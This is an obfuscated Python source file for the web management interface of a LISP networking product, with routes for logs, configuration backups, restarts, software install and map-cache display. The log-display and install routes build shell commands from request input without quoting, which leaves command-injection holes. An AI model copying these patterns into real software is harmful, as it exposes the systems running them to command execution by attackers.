if 85 - 85: ooOoO0o / O0
if 18 - 18: o0oOOo0O0Ooo % O0 * I1ii11iIi11i
if 62 - 62: I1Ii111 . IiII . OoooooooOO
if 11 - 11: OOooOOo / I11i
if 73 - 73: i1IIi / i11iIiiIii
if 58 - 58: Oo0Ooo . II111iiii + oO0o - i11iIiiIii / II111iiii / O0
@bottle.route('/lisp/show/diff')
def oOOoOo():
    """Serve the configuration diff file as plain text."""
    if (lispconfig.lisp_validate_user() == False):
        return (oOO00O())
    return bottle.static_file("lisp.config.diff", root="./",
        mimetype="text/plain")
if 7 - 7: O0 % o0oOOo0O0Ooo + I1ii11iIi11i * iII111i - iII111i
if 42 - 42: OoOoOO00 * OoOoOO00 * I1Ii111 . I11i
if 51 - 51: OOooOOo % iIii1I11I1II1 - OoooooooOO % ooOoO0o * iIii1I11I1II1 % OoO0O00
if 99 - 99: oO0o * II111iiii * I1Ii111
if 92 - 92: Oo0Ooo
if 40 - 40: OoOoOO00 / IiII
if 79 - 79: OoO0O00 - iIii1I11I1II1 + Ii1I - I1Ii111
@bottle.route('/lisp/archive/conf')
def OoO():
    """Copy lisp.config to lisp.config.archive under the config IPC lock."""
    if (lispconfig.lisp_validate_user() == False):
        return (oOO00O())

    # Hold the lock so the config file is not rewritten mid-copy.
    lisp.lisp_ipc_lock.acquire()
    os.system("cp ./lisp.config ./lisp.config.archive")
    lisp.lisp_ipc_lock.release()

    page = lisp.lisp_print_sans("Configuration file saved to ")
    page += lisp.lisp_print_cour("./lisp.config.archive")
    return lispconfig.lisp_show_wrapper(page)
if 31 - 31: OOooOOo + O0
if 87 - 87: ooOoO0o
if 45 - 45: OoO0O00 / OoooooooOO - iII111i / Ii1I % IiII
if 83 - 83: I1IiiI . iIii1I11I1II1 - IiII * i11iIiiIii
if 20 - 20: i1IIi * I1Ii111 + II111iiii % o0oOOo0O0Ooo % oO0o
if 13 - 13: Oo0Ooo
if 60 - 60: I1ii11iIi11i * I1IiiI
@bottle.route('/lisp/clear/conf')
def I1iIiI11I1():
    """Back up lisp.config and clear the configuration under the IPC lock."""
    if (lispconfig.lisp_validate_user() == False):
        return (oOO00O())

    os.system("cp ./lisp.config ./lisp.config.before-clear")
    lisp.lisp_ipc_lock.acquire()
    iI11I()
    lisp.lisp_ipc_lock.release()

    page = lisp.lisp_print_sans("Configuration cleared, a backup copy is stored in ")
    page += lisp.lisp_print_cour("./lisp.config.before-clear")
    return lispconfig.lisp_show_wrapper(page)
if 7 - 7: IiII - I11i / II111iiii * Ii1I . iII111i * iII111i
if 61 - 61: I11i % ooOoO0o - OoO0O00 / Oo0Ooo
if 4 - 4: OoooooooOO - i1IIi % Ii1I - OOooOOo * o0oOOo0O0Ooo
if 85 - 85: OoooooooOO * iIii1I11I1II1 . iII111i / OoooooooOO % I1IiiI % O0
if 36 - 36: Ii1I / II111iiii / IiII / IiII + I1ii11iIi11i
if 95 - 95: IiII
if 51 - 51: II111iiii + IiII . i1IIi . I1ii11iIi11i + OoOoOO00 * I1IiiI
@bottle.route('/lisp/clear/conf/verify')
def OOoOoo0():
    """Ask the operator to confirm clearing the configuration."""
    if (lispconfig.lisp_validate_user() == False):
        return (oOO00O())

    prompt = lisp.lisp_print_sans(
        "<br>Are you sure you want to clear the configuration?")
    yes_button = lisp.lisp_button("yes", "/lisp/clear/conf")
    cancel_button = lisp.lisp_button("cancel", "/lisp")
    return lispconfig.lisp_show_wrapper(prompt + yes_button + cancel_button + "<br>")
if 19 - 19: OoO0O00 * I11i / I11i . OoooooooOO - OOooOOo + i11iIiiIii
if 88 - 88: i11iIiiIii - ooOoO0o
if 67 - 67: OOooOOo . Oo0Ooo + OoOoOO00 - OoooooooOO
if 70 - 70: OOooOOo / II111iiii - iIii1I11I1II1 - iII111i
if 11 - 11: iIii1I11I1II1 . OoooooooOO . II111iiii / i1IIi - I11i
if 30 - 30: OoOoOO00
if 21 - 21: i11iIiiIii / I1Ii111 % OOooOOo * O0 . I11i - iIii1I11I1II1
if 26 - 26: II111iiii * OoOoOO00
if 10 - 10: II111iiii . iII111i
def I1iOOOO():
    """Return the port argument the running lisp-core.pyo was started with.

    Tries "443", "-8080", then "8080" in order and stops at the first
    candidate for which ps reports any matching process.  Returns "" when
    no running lisp-core.pyo is found.
    """
    found = ""
    for port in ["443", "-8080", "8080"]:
        ps_cmd = 'ps auxww | egrep "lisp-core.pyo {}" | egrep -v grep'.format(port)
        ps_out = commands.getoutput(ps_cmd)
        if (ps_out == ""): continue

        fields = ps_out.split("\n")[0].split(" ")
        # Accept only an exact trailing "lisp-core.pyo <port>" command line.
        if (fields[-2] == "lisp-core.pyo" and fields[-1] == port):
            found = port
        break  # first candidate with any ps output decides the outcome
    return (found)
if 67 - 67: OOooOOo + Oo0Ooo
if 84 - 84: O0 * OoooooooOO - IiII * IiII
if 8 - 8: ooOoO0o / i1IIi . oO0o
if 41 - 41: iII111i + OoO0O00
if 86 - 86: OoOoOO00 . iIii1I11I1II1 - OoO0O00
if 56 - 56: O0
if 61 - 61: o0oOOo0O0Ooo / OOooOOo / Oo0Ooo * O0
@bottle.route('/lisp/restart')
def iIII1i1i():
    """Kick off an asynchronous restart of the LISP subsystem."""
    if (lispconfig.lisp_validate_user() == False):
        return (oOO00O())

    # A "Defaults requiretty" line in /etc/sudoers would make the
    # background sudo below fail -- refuse and tell the operator.
    sudoers = commands.getoutput("egrep requiretty /etc/sudoers").split(" ")
    if (sudoers[-1] == "requiretty" and sudoers[0] == "Defaults"):
        page = lisp.lisp_print_sans("Need to remove 'requiretty' from /etc/sudoers")
        return lispconfig.lisp_show_wrapper(page)

    lisp.lprint(lisp.bold("LISP subsystem restart request received", False))

    # Restart on the port lisp-core is currently running on, in a
    # background thread so this request can return first.
    port = I1iOOOO()
    restart_cmd = "sleep 1; sudo ./RESTART-LISP {}".format(port)
    thread.start_new_thread(os.system, (restart_cmd,))

    page = lisp.lisp_print_sans("Restarting LISP subsystem ...")
    return lispconfig.lisp_show_wrapper(page)
if 22 - 22: ooOoO0o - ooOoO0o % OOooOOo . I1Ii111 + oO0o
if 63 - 63: I1IiiI % I1Ii111 * o0oOOo0O0Ooo + I1Ii111 / Oo0Ooo % iII111i
if 45 - 45: IiII
if 20 - 20: OoooooooOO * o0oOOo0O0Ooo * O0 . OOooOOo
if 78 - 78: iIii1I11I1II1 + I11i - Ii1I * I1Ii111 - OoooooooOO % OoOoOO00
if 34 - 34: O0
if 80 - 80: i1IIi - Oo0Ooo / OoO0O00 - i11iIiiIii
@bottle.route('/lisp/restart/verify')
def OO0O0o0o0():
    """Ask the operator to confirm restarting the LISP subsystem."""
    if (lispconfig.lisp_validate_user() == False):
        return (oOO00O())

    prompt = lisp.lisp_print_sans(
        "<br>Are you sure you want to restart the LISP subsystem?")
    yes_button = lisp.lisp_button("yes", "/lisp/restart")
    cancel_button = lisp.lisp_button("cancel", "/lisp")
    return lispconfig.lisp_show_wrapper(prompt + yes_button + cancel_button + "<br>")
if 95 - 95: iIii1I11I1II1 - I1ii11iIi11i . I1Ii111 - I1IiiI
if 75 - 75: OoO0O00 + o0oOOo0O0Ooo - i1IIi . OoooooooOO * Ii1I / IiII
if 86 - 86: OoOoOO00 * II111iiii - O0 . OoOoOO00 % iIii1I11I1II1 / OOooOOo
if 11 - 11: I1IiiI * oO0o + I1ii11iIi11i / I1ii11iIi11i
if 37 - 37: i11iIiiIii + i1IIi
if 23 - 23: iII111i + I11i . OoOoOO00 * I1IiiI + I1ii11iIi11i
if 18 - 18: IiII * o0oOOo0O0Ooo . IiII / O0
@bottle.route('/lisp/install', method="post")
def iiIII1II():
    """Download and install a lispers.net release tarball.

    Reads the tarball URL from the posted form, fetches it with
    lisp-get-bits.pyo, and reports success/failure based on whether the
    tarball landed in the current directory.
    """
    if (lispconfig.lisp_validate_user() == False):
        return (oOO00O())

    url = bottle.request.forms.get("image_url")

    # Only accept lispers.net .tgz tarballs.
    if (url.find("lispers.net") == -1 or url.find(".tgz") == -1):
        lisp.lprint(lisp.bold("Invalid install request for file {}".format(url), False))
        page = lisp.lisp_print_sans("Invalid lispers.net tarball file name")
        return lispconfig.lisp_show_wrapper(page)

    # Ubuntu's shell needs the "2>&1 >" redirect spelling.
    if (lisp.lisp_is_ubuntu()):
        fetch_cmd = "python lisp-get-bits.pyo {} force 2>&1 > /dev/null".format(url)
    else:
        fetch_cmd = "python lisp-get-bits.pyo {} force >& /dev/null".format(url)
    status = os.system(fetch_cmd)

    # Success test: did the tarball actually land in the current directory?
    tarball = url.split("/")[-1]
    if (os.path.exists(tarball)):
        release = url.split("release-")[1].split(".tgz")[0]
        page = lisp.lisp_print_sans("Install completed for release {}".format(release))
        page += "<br><br>" + lisp.lisp_button("restart LISP subsystem",
            "/lisp/restart/verify") + "<br>"
    else:
        page = lisp.lisp_print_sans(
            "Install failed for file {}".format(lisp.lisp_print_cour(url)))

    log_msg = "Install request for file {} {}".format(url,
        "succeeded" if (status == 0) else "failed")
    lisp.lprint(lisp.bold(log_msg, False))
    return lispconfig.lisp_show_wrapper(page)
if 62 - 62: Ii1I
if 51 - 51: OoOoOO00
if 14 - 14: IiII % oO0o % Oo0Ooo - i11iIiiIii
if 53 - 53: Ii1I % Oo0Ooo
if 59 - 59: OOooOOo % iIii1I11I1II1 . i1IIi + II111iiii * IiII
if 41 - 41: Ii1I % I1ii11iIi11i
if 12 - 12: OOooOOo
@bottle.route('/lisp/install/image')
def ooOo0O():
    """Show the form that asks for a lispers.net tarball URL to install."""
    if (lispconfig.lisp_validate_user() == False):
        return (oOO00O())

    prompt = lisp.lisp_print_sans("<br>Enter lispers.net tarball URL:")
    page = '''
<form action="/lisp/install" method="post" style="display: inline;">
{}
<input type="text" name="image_url" size="75" required/>
<input type="submit" style="background-color:transparent;border-radius:10px;" value="Submit" />
</form><br>'''.format(prompt)

    return lispconfig.lisp_show_wrapper(page)
if 56 - 56: OoooooooOO % i11iIiiIii * iIii1I11I1II1 . OoO0O00 * O0
if 23 - 23: i11iIiiIii
if 39 - 39: o0oOOo0O0Ooo - I1ii11iIi11i % iII111i * OoO0O00 - OOooOOo / iII111i
if 29 - 29: I1ii11iIi11i
if 52 - 52: i11iIiiIii / i1IIi
if 1 - 1: ooOoO0o
if 78 - 78: I1ii11iIi11i + I11i - O0
if 10 - 10: I1Ii111 % I1IiiI
@bottle.route('/lisp/log/flows')
def oo0OoOooo():
    """Signal the data plane (via the ./log-flows file) to dump flow data."""
    if (lispconfig.lisp_validate_user() == False):
        return (oOO00O())

    os.system("touch ./log-flows")

    page = lisp.lisp_print_sans("Flow data appended to file ")
    page += lisp.lisp_print_cour(
        "<a href='/lisp/show/log/lisp-flow/100'>logs/lisp-flows.log</a>")
    return lispconfig.lisp_show_wrapper(page)
if 50 - 50: IiII % i1IIi
if 21 - 21: OoooooooOO - iIii1I11I1II1
if 93 - 93: oO0o - o0oOOo0O0Ooo % OoOoOO00 . OoOoOO00 - ooOoO0o
if 90 - 90: ooOoO0o + II111iiii * I1ii11iIi11i / Ii1I . o0oOOo0O0Ooo + o0oOOo0O0Ooo
if 40 - 40: ooOoO0o / OoOoOO00 % i11iIiiIii % I1ii11iIi11i / I1IiiI
if 62 - 62: i1IIi - OoOoOO00
if 62 - 62: i1IIi + Oo0Ooo % IiII
if 28 - 28: I1ii11iIi11i . i1IIi
@bottle.route('/lisp/search/log/<name>/<num>/<keyword>')
def iIIi(name="", num="", keyword=""):
    """Search the tail of a log file for a keyword and render the matches.

    Greps the last <num> lines of logs/<name>.log for <keyword> (with 10
    lines of context either side), highlights each occurrence in blue
    bold, and returns the wrapped HTML page.
    """
    if (lispconfig.lisp_validate_user() == False):
        return (oOO00O())

    # name/num/keyword come straight from the URL -- shell-quote each one
    # so a crafted request cannot inject extra commands into the pipeline.
    try:
        from shlex import quote       # python3
    except ImportError:
        from pipes import quote       # python2
    OOoOO0o0o0 = "tail -n {} {} | egrep -B10 -A10 {}".format(quote(str(num)),
        quote("logs/{}.log".format(name)), quote(keyword))
    i1I1ii = commands.getoutput(OOoOO0o0o0)

    if (i1I1ii):
        iI1iii = i1I1ii.count(keyword)
        i1I1ii = lisp.convert_font(i1I1ii)
        i1I1ii = i1I1ii.replace("--\n--\n", "--\n")
        i1I1ii = i1I1ii.replace("\n", "<br>")
        i1I1ii = i1I1ii.replace("--<br>", "<hr>")
        i1I1ii = "Found <b>{}</b> occurrences<hr>".format(iI1iii) + i1I1ii
    else:
        i1I1ii = "Keyword {} not found".format(keyword)

    # Highlight each match in a single pass.  The old two-step replace
    # produced mis-nested markup ("<b>kw</font></b>") because the second
    # replace also matched the keyword just inserted by the first one.
    i1o0oooO = "<font color='blue'><b>{}</b></font>".format(keyword)
    i1I1ii = i1I1ii.replace(keyword, i1o0oooO)

    i1I1ii = lisp.lisp_print_cour(i1I1ii)
    return (lispconfig.lisp_show_wrapper(i1I1ii))
if 14 - 14: OOooOOo . I1IiiI * ooOoO0o + II111iiii - ooOoO0o + OOooOOo
if 18 - 18: oO0o - o0oOOo0O0Ooo - I1IiiI - I1IiiI
if 54 - 54: Oo0Ooo + I1IiiI / iII111i . I1IiiI * OoOoOO00
if 1 - 1: OoOoOO00 * OoO0O00 . i1IIi / Oo0Ooo . I1ii11iIi11i + Oo0Ooo
if 17 - 17: Oo0Ooo + OoO0O00 / Ii1I / iII111i * OOooOOo
if 29 - 29: OoO0O00 % OoooooooOO * oO0o / II111iiii - oO0o
if 19 - 19: i11iIiiIii
@bottle.post('/lisp/search/log/<name>/<num>')
def oo0oOO(name="", num=""):
    """Handle the keyword-search form post by delegating to the GET handler."""
    if (lispconfig.lisp_validate_user() == False):
        return (oOO00O())

    keyword = bottle.request.forms.get("keyword")
    return iIIi(name, num, keyword)
if 4 - 4: o0oOOo0O0Ooo % OoOoOO00 * OOooOOo
if 32 - 32: i11iIiiIii - I1Ii111
if 53 - 53: OoooooooOO - IiII
if 87 - 87: oO0o . I1IiiI
if 17 - 17: Ii1I . i11iIiiIii
if 5 - 5: I1ii11iIi11i + O0 + O0 . I1Ii111 - ooOoO0o
if 63 - 63: oO0o
@bottle.route('/lisp/show/log/<name>/<num>')
def Oo0(name="", num=""):
    """Show the tail of logs/<name>.log with a keyword-search form on top.

    <num> is the number of lines to tail; it defaults to 100 when absent.
    """
    if (lispconfig.lisp_validate_user() == False):
        return (oOO00O())

    if (num == ""): num = 100

    search_form = '''
<form action="/lisp/search/log/{}/{}" method="post">
<i>Keyword search:</i>
<input type="text" name="keyword" />
<input style="background-color:transparent;border-radius:10px;" type="submit" value="Submit" />
</form><hr>
'''.format(name, num)

    log_path = "logs/{}.log".format(name)
    if (os.path.exists(log_path)):
        tail = commands.getoutput("tail -n {} logs/{}.log".format(num, name))
        tail = lisp.convert_font(tail)
        tail = tail.replace("\n", "<br>")
        page = search_form + lisp.lisp_print_cour(tail)
    else:
        page = "{} {} {}".format(lisp.lisp_print_sans("File"),
            lisp.lisp_print_cour("logs/{}.log".format(name)),
            lisp.lisp_print_sans("does not exist"))

    return lispconfig.lisp_show_wrapper(page)
if 77 - 77: oO0o % i1IIi - Ii1I
if 93 - 93: OoO0O00 * Oo0Ooo
if 73 - 73: o0oOOo0O0Ooo - I1IiiI * i1IIi / i11iIiiIii * OOooOOo % II111iiii
if 56 - 56: OoooooooOO * Oo0Ooo . Oo0Ooo . I1ii11iIi11i
if 24 - 24: Oo0Ooo . I11i * Ii1I % iII111i / OOooOOo
if 58 - 58: I1IiiI - I1ii11iIi11i % O0 . I1IiiI % OoO0O00 % IiII
if 87 - 87: oO0o - i11iIiiIii
@bottle.route('/lisp/debug/<name>')
def ooOoO(name=""):
    """Toggle one debug/logging setting, or disable them all.

    The URL parameter is "<setting>%<value>".  The special value
    "disable%all" turns off every "lisp debug" sub-clause plus the
    data-plane-logging / flow-logging xtr-parameters.
    """
    if (lispconfig.lisp_validate_user() == False):
        return (oOO00O())
    if 23 - 23: I11i
    if 40 - 40: o0oOOo0O0Ooo - II111iiii / Oo0Ooo
    if 14 - 14: I1ii11iIi11i
    if 5 - 5: o0oOOo0O0Ooo . iIii1I11I1II1 % iIii1I11I1II1
    if 56 - 56: OoooooooOO - I11i - i1IIi
    if (name == "disable%all"):
        # Rewrite every "lisp debug" sub-clause to "no".
        IIIi1i1I = lispconfig.lisp_get_clause_for_api("lisp debug")
        if (IIIi1i1I[0].has_key("lisp debug")):
            OoO0OOOOo0O = []
            for I1i1I in IIIi1i1I[0]["lisp debug"]:
                iii1I1Iii = I1i1I.keys()[0]
                OoO0OOOOo0O.append({iii1I1Iii: "no"})
            if 82 - 82: Ii1I + IiII
            OoO0OOOOo0O = {"lisp debug": OoO0OOOOo0O}
            lispconfig.lisp_put_clause_for_api(OoO0OOOOo0O)
        if 12 - 12: I1Ii111
        if 93 - 93: i11iIiiIii % iIii1I11I1II1 % i11iIiiIii + o0oOOo0O0Ooo / o0oOOo0O0Ooo / II111iiii
        # Also clear the two logging-related xtr-parameters; every other
        # xtr-parameter is written back unchanged.
        IIIi1i1I = lispconfig.lisp_get_clause_for_api("lisp xtr-parameters")
        if (IIIi1i1I[0].has_key("lisp xtr-parameters")):
            OoO0OOOOo0O = []
            for I1i1I in IIIi1i1I[0]["lisp xtr-parameters"]:
                iii1I1Iii = I1i1I.keys()[0]
                if (iii1I1Iii in ["data-plane-logging", "flow-logging"]):
                    OoO0OOOOo0O.append({iii1I1Iii: "no"})
                else:
                    OoO0OOOOo0O.append({iii1I1Iii: I1i1I[iii1I1Iii]})
                if 49 - 49: OOooOOo . I1ii11iIi11i . i11iIiiIii - II111iiii / Ii1I
                if 62 - 62: OOooOOo
            OoO0OOOOo0O = {"lisp xtr-parameters": OoO0OOOOo0O}
            lispconfig.lisp_put_clause_for_api(OoO0OOOOo0O)
        if 1 - 1: IiII / IiII - i11iIiiIii
        if 87 - 87: Oo0Ooo / O0 * IiII / o0oOOo0O0Ooo
        return (lispconfig.lisp_landing_page())
    if 19 - 19: I1Ii111 + i1IIi . I1IiiI - Oo0Ooo
    if 16 - 16: oO0o + ooOoO0o / o0oOOo0O0Ooo
    if 82 - 82: IiII * i11iIiiIii % II111iiii - OoooooooOO
    if 90 - 90: Oo0Ooo . oO0o * i1IIi - i1IIi
    if 16 - 16: I1IiiI * i1IIi - o0oOOo0O0Ooo . IiII % I11i / o0oOOo0O0Ooo
    # Single-setting case: split "<setting>%<value>".
    name = name.split("%")
    Ii11iI1ii1111 = name[0]   # setting keyword
    Iii111II = name[1]        # new value
    if 42 - 42: I1Ii111 + I1Ii111 * II111iiii
    # These two settings live in "lisp xtr-parameters"; all other debug
    # settings live in the "lisp debug" clause.
    o0Oo = ["data-plane-logging", "flow-logging"]
    if 57 - 57: OOooOOo / Oo0Ooo
    oO0O0Ooo = "lisp xtr-parameters" if (Ii11iI1ii1111 in o0Oo) else "lisp debug"
    if 4 - 4: II111iiii . I11i + Ii1I * I1Ii111 . ooOoO0o
    if 87 - 87: OoOoOO00 / OoO0O00 / i11iIiiIii
    IIIi1i1I = lispconfig.lisp_get_clause_for_api(oO0O0Ooo)
    if 74 - 74: oO0o / I1ii11iIi11i % o0oOOo0O0Ooo
    if (IIIi1i1I[0].has_key(oO0O0Ooo)):
        # Flatten the clause into a dict, update just the requested key,
        # and write the whole clause back.
        OoO0OOOOo0O = {}
        for I1i1I in IIIi1i1I[0][oO0O0Ooo]:
            OoO0OOOOo0O[I1i1I.keys()[0]] = I1i1I.values()[0]
        if (OoO0OOOOo0O.has_key(Ii11iI1ii1111)): OoO0OOOOo0O[Ii11iI1ii1111] = Iii111II
        if 88 - 88: OoOoOO00 - i11iIiiIii % o0oOOo0O0Ooo * I11i + I1ii11iIi11i
        OoO0OOOOo0O = {oO0O0Ooo: OoO0OOOOo0O}
        lispconfig.lisp_put_clause_for_api(OoO0OOOOo0O)
    if 52 - 52: II111iiii . I1IiiI + OoOoOO00 % OoO0O00
    return (lispconfig.lisp_landing_page())
if 62 - 62: o0oOOo0O0Ooo
if 15 - 15: I11i + Ii1I . OOooOOo * OoO0O00 . OoOoOO00
if 18 - 18: i1IIi % II111iiii + I1Ii111 % Ii1I
if 72 - 72: iIii1I11I1II1
if 45 - 45: Oo0Ooo - o0oOOo0O0Ooo % I1Ii111
if 38 - 38: I1Ii111 % OOooOOo - OoooooooOO
if 87 - 87: OoO0O00 % I1IiiI
@bottle.route('/lisp/clear/<name>')
@bottle.route('/lisp/clear/etr/<etr_name>/<stats_name>')
@bottle.route('/lisp/clear/rtr/<rtr_name>/<stats_name>')
@bottle.route('/lisp/clear/itr/<itr_name>')
@bottle.route('/lisp/clear/rtr/<rtr_name>')
def ooooOoO0O(name="", itr_name='', rtr_name="", etr_name="",
    stats_name=""):
    """Clear a map-cache or decapsulation-stats table in a LISP process.

    The matched route decides the target: MR referral cache, ITR/RTR
    map-cache, or per-RLOC decap stats (ETR/RTR).  Superuser only.
    """
    if 1 - 1: I1ii11iIi11i / OoO0O00 + oO0o . o0oOOo0O0Ooo / I1ii11iIi11i - iII111i
    if (lispconfig.lisp_validate_user() == False):
        return (oOO00O())
    if 5 - 5: OOooOOo
    if 4 - 4: iII111i % I1Ii111 / OoO0O00 . OOooOOo / OOooOOo - I1ii11iIi11i
    if 79 - 79: I1ii11iIi11i + I1Ii111
    if 10 - 10: Oo0Ooo + O0
    if 43 - 43: iIii1I11I1II1 / II111iiii % o0oOOo0O0Ooo - OOooOOo
    if (lispconfig.lisp_is_user_superuser(None) == False):
        i1I1ii = lisp.lisp_print_sans("Not authorized")
        return (lispconfig.lisp_show_wrapper(i1I1ii))
    if 62 - 62: I11i
    if 63 - 63: OOooOOo + ooOoO0o * oO0o / o0oOOo0O0Ooo / Oo0Ooo * iIii1I11I1II1
    # Build the IPC "clear" command and pick the destination process.
    Oo0O00Oo0o0 = "clear"
    if (name == "referral"):
        OOoO00ooO = "lisp-mr"
        I1IIIIiii1i = "Referral"
    elif (itr_name == "map-cache"):
        OOoO00ooO = "lisp-itr"
        I1IIIIiii1i = "ITR <a href='/lisp/show/itr/map-cache'>map-cache</a>"
    elif (rtr_name == "map-cache"):
        OOoO00ooO = "lisp-rtr"
        I1IIIIiii1i = "RTR <a href='/lisp/show/rtr/map-cache'>map-cache</a>"
    elif (etr_name == "stats"):
        OOoO00ooO = "lisp-etr"
        I1IIIIiii1i = ("ETR '{}' decapsulation <a href='/lisp/show/" + "database'>stats</a>").format(stats_name)
        if 51 - 51: OOooOOo . I1IiiI
        # Stats clears carry the RLOC name inside the command itself.
        Oo0O00Oo0o0 += "%" + stats_name
    elif (rtr_name == "stats"):
        OOoO00ooO = "lisp-rtr"
        I1IIIIiii1i = ("RTR '{}' decapsulation <a href='/lisp/show/" + "rtr/map-cache'>stats</a>").format(stats_name)
        if 73 - 73: OoooooooOO . I1IiiI / I1Ii111 % Ii1I
        Oo0O00Oo0o0 += "%" + stats_name
    else:
        i1I1ii = lisp.lisp_print_sans("Invalid command")
        return (lispconfig.lisp_show_wrapper(i1I1ii))
    if 65 - 65: IiII - I1IiiI - Ii1I
    if 42 - 42: II111iiii * I1IiiI % i1IIi - Ii1I % IiII
    if 36 - 36: i11iIiiIii / oO0o * I1ii11iIi11i * I1ii11iIi11i + Ii1I * I11i
    if 32 - 32: OoO0O00
    if 50 - 50: ooOoO0o + i1IIi
    # Send the command to the target process over IPC.
    # NOTE(review): "Oo" is a module-level IPC socket defined outside this
    # chunk -- confirm.
    Oo0O00Oo0o0 = lisp.lisp_command_ipc(Oo0O00Oo0o0, "lisp-core")
    lisp.lisp_ipc(Oo0O00Oo0o0, Oo, OOoO00ooO)
    if 31 - 31: Ii1I
    if 78 - 78: i11iIiiIii + o0oOOo0O0Ooo + I1Ii111 / o0oOOo0O0Ooo % iIii1I11I1II1 % IiII
    if 83 - 83: iIii1I11I1II1 % OoOoOO00 % o0oOOo0O0Ooo % I1Ii111 . I1ii11iIi11i % O0
    if 47 - 47: o0oOOo0O0Ooo
    # Touch lisp.config so configured static map-cache entries are re-read
    # and re-installed after the clear.
    oo0ooooO = commands.getoutput("egrep 'lisp map-cache' ./lisp.config")
    if (oo0ooooO != ""):
        os.system("touch ./lisp.config")
    if 12 - 12: II111iiii
    if 2 - 2: i1IIi - I1IiiI + I11i . II111iiii
    i1I1ii = lisp.lisp_print_sans("{} cleared".format(I1IIIIiii1i))
    return (lispconfig.lisp_show_wrapper(i1I1ii))
if 25 - 25: oO0o
if 34 - 34: OoOoOO00 . iIii1I11I1II1 % O0
if 43 - 43: I1ii11iIi11i - iII111i
if 70 - 70: iII111i / OOooOOo % ooOoO0o - Ii1I
if 47 - 47: iII111i
if 92 - 92: OOooOOo + OoOoOO00 % i1IIi
if 23 - 23: I1Ii111 - OOooOOo + Ii1I - OoOoOO00 * OoOoOO00 . Oo0Ooo
@bottle.route('/lisp/show/map-server')
def iIii11iI1II():
    """Show the configured map-servers."""
    if (lispconfig.lisp_validate_user() == False):
        return (oOO00O())
    return lispconfig.lisp_process_show_command(Oo, "show map-server")
if 56 - 56: ooOoO0o / iIii1I11I1II1 . Ii1I % OoOoOO00 + OOooOOo
if 10 - 10: I1Ii111 * i11iIiiIii - iIii1I11I1II1 . Oo0Ooo - I1ii11iIi11i
if 20 - 20: I1ii11iIi11i / I1IiiI * OoO0O00 * I1IiiI * O0
if 1 - 1: iIii1I11I1II1 + Oo0Ooo / O0 - iII111i % IiII + IiII
if 24 - 24: I1IiiI + Oo0Ooo + OOooOOo - OoooooooOO + Oo0Ooo
if 93 - 93: ooOoO0o . iIii1I11I1II1 % i11iIiiIii . OoOoOO00 % ooOoO0o + O0
if 65 - 65: Ii1I + OoO0O00 - OoooooooOO
@bottle.route('/lisp/show/database')
def OOoOO0o():
    """Show the database-mappings."""
    if (lispconfig.lisp_validate_user() == False):
        return (oOO00O())
    return lispconfig.lisp_process_show_command(Oo, "show database-mapping")
if 12 - 12: iIii1I11I1II1 % ooOoO0o % ooOoO0o
if 78 - 78: IiII . OoOoOO00 . I11i
if 97 - 97: oO0o
if 80 - 80: I1IiiI . Ii1I
if 47 - 47: I11i + ooOoO0o + II111iiii % i11iIiiIii
if 93 - 93: I1ii11iIi11i % OoOoOO00 . O0 / iII111i * oO0o
if 29 - 29: o0oOOo0O0Ooo
@bottle.route('/lisp/show/itr/map-cache')
def oo0iIiI():
    """Show the ITR map-cache."""
    if (lispconfig.lisp_validate_user() == False):
        return (oOO00O())
    return lispconfig.lisp_process_show_command(Oo, "show itr-map-cache")
if 87 - 87: iIii1I11I1II1 . OoooooooOO * OoOoOO00
if 100 - 100: OoO0O00 / i1IIi - I1IiiI % Ii1I - iIii1I11I1II1
if 17 - 17: I11i / o0oOOo0O0Ooo % Oo0Ooo
if 71 - 71: IiII . I1Ii111 . OoO0O00
if 68 - 68: i11iIiiIii % oO0o * OoO0O00 * IiII * II111iiii + O0
if 66 - 66: I11i % I1ii11iIi11i % OoooooooOO
if 34 - 34: o0oOOo0O0Ooo / iII111i % O0 . OoO0O00 . i1IIi
@bottle.route('/lisp/show/itr/rloc-probing')
def ii():
    """Show ITR RLOC-probing state."""
    if (lispconfig.lisp_validate_user() == False):
        return (oOO00O())
    return lispconfig.lisp_process_show_command(Oo, "show itr-rloc-probing")
if 66 - 66: ooOoO0o - OOooOOo * OoOoOO00 / oO0o * II111iiii * OoO0O00
if 91 - 91: OoooooooOO / Ii1I . I1IiiI + ooOoO0o . II111iiii
if 45 - 45: oO0o * OoOoOO00 / iIii1I11I1II1
if 77 - 77: I1Ii111 - I11i
if 11 - 11: I1ii11iIi11i
if 26 - 26: iIii1I11I1II1 * I1Ii111 - OOooOOo
if 27 - 27: I1ii11iIi11i * I1Ii111 - OoO0O00 + Ii1I * Ii1I
@bottle.post('/lisp/show/itr/map-cache/lookup')
def o0OO0O0OO0oO0():
    """Look up one EID (from the posted form) in the ITR map-cache."""
    if (lispconfig.lisp_validate_user() == False):
        return (oOO00O())

    eid = bottle.request.forms.get("eid")
    if (lispconfig.lisp_validate_input_address_string(eid) == False):
        page = lisp.lisp_print_sans("Address '{}' has invalid format".format(eid))
        return lispconfig.lisp_show_wrapper(page)

    return lispconfig.lisp_process_show_command(Oo,
        "show itr-map-cache" + "%" + eid)
if 66 - 66: i11iIiiIii * iIii1I11I1II1 % OoooooooOO
if 5 - 5: OoOoOO00 % OoooooooOO
if 60 - 60: OoOoOO00 . i1IIi % OoO0O00 % ooOoO0o % OOooOOo
if 33 - 33: iIii1I11I1II1 - Ii1I * I1ii11iIi11i % iIii1I11I1II1 + OoO0O00 . OOooOOo
if 56 - 56: i11iIiiIii * iII111i . oO0o
if 78 - 78: OoOoOO00
if 1 - 1: OOooOOo . IiII
@bottle.route('/lisp/show/rtr/map-cache')
@bottle.route('/lisp/show/rtr/map-cache/<dns>')
def I1iIII1IiiI(dns=""):
    """Web-UI route: render the RTR map-cache; the optional 'dns' URL
    component selects the DNS-name variant of the display."""
    if lispconfig.lisp_validate_user() == False:
        return oOO00O()

    keyword = "show rtr-map-cache-dns" if dns == "dns" else "show rtr-map-cache"
    return lispconfig.lisp_process_show_command(Oo, keyword)
if 48 - 48: i11iIiiIii % oO0o
if 29 - 29: iII111i + i11iIiiIii % I11i
if 93 - 93: OoOoOO00 % iIii1I11I1II1
if 90 - 90: I1IiiI - OOooOOo / Ii1I / O0 / I11i
if 87 - 87: OoOoOO00 / IiII + iIii1I11I1II1
if 93 - 93: iIii1I11I1II1 + oO0o % ooOoO0o
if 21 - 21: OOooOOo
if 6 - 6: IiII
@bottle.route('/lisp/show/rtr/rloc-probing')
def i1I1II():
    """Web-UI route: render the RTR's RLOC-probing state page."""
    if lispconfig.lisp_validate_user() == False:
        return oOO00O()

